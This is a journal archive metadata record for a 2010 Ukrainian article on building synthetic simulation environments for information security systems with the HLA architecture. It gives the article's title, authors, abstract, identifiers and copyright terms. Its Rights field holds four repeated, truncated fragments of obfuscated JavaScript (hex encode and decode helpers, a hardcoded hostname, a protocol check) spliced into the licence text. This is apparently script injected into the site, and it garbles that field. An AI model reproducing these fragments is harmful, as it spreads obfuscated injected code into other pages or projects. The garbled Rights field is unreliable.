ТЕХНОЛОГІЯ ПОБУДОВИ СИНТЕТИЧНОГО ОТОЧЕННЯ СИСТЕМ ІНФОРМАЦІЙНОЇ БЕЗПЕКИ
Наукові журнали Національного Авіаційного Університету
View Archive InfoField | Value | |
Title |
ТЕХНОЛОГІЯ ПОБУДОВИ СИНТЕТИЧНОГО ОТОЧЕННЯ СИСТЕМ ІНФОРМАЦІЙНОЇ БЕЗПЕКИ
The technology of synthetic environment constructing for information security systems Tехнология построения синтетического окружения систем информационной безопасности |
|
Creator |
Казимир, В.В.; Інститут проблем математичних машин та систем НАН України
Сіра, Г.А.; Інститут проблем математичних машин та систем НАН України Черних, Д.О.; Національний авіаційний університет |
|
Subject |
архітектура HLA; бізнес-процес; імітаційна модель; синтетичне оточення; система інформаційної безпеки
business process; HLA architecture; information security system; simulated model; synthetic environment архитектура HLA; бизнес-процесс; имитационная модель; синтетическое окружение; система информационной безопасности |
|
Description |
Запропоновано технологію до формалізованого подання імітаційних моделей систем інформаційної безпеки на основі конвертації формалізованих описів моделей, отриманих за допомогою інших програм моделювання бізнес-процесів синтетичного оточення систем в XML-файли.
An information technology is suggested to provide the automatic development of simulated models by converting graphic models of business process, got by other programs for modeling. Got simulated models can be used for the synthetic environment construction of information security systems to define more exactly models features and characteristics. Developed information technology can be as base for distributed modeling systems constructing within the limits of realization HLA. Рассмотрена технология формализированного представления имитационных моделей систем информационной безопасности на основе конвертации формализированных описаний моделей, полученных с помощью других программ моделирования бизнес-процессов синтетического окружения систем в XML-файлы. Имитационные модели могут использоваться для построения синтетического окружения систем информационной безопасности для уточнения их свойств и характеристик. Разработанная информационная технология может служить основой для построения распределенного моделирования в рамках реализации HLA. |
|
Publisher |
National Aviation University
|
|
Contributor |
—
— — |
|
Date |
2010-01-01
|
|
Type |
—
— — |
|
Format |
application/pdf
|
|
Identifier |
http://jrnl.nau.edu.ua/index.php/visnik/article/view/1828
10.18372/2306-1472.42.1828 |
|
Source |
Proceedings of the National Aviation University; Том 42, № 1 (2010); 159-163
Вестник Национального авиационного университета; Том 42, № 1 (2010); 159-163 Вісник Національного Авіаційного Університету; Том 42, № 1 (2010); 159-163 |
|
Language |
uk
|
|
Rights |
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e |
|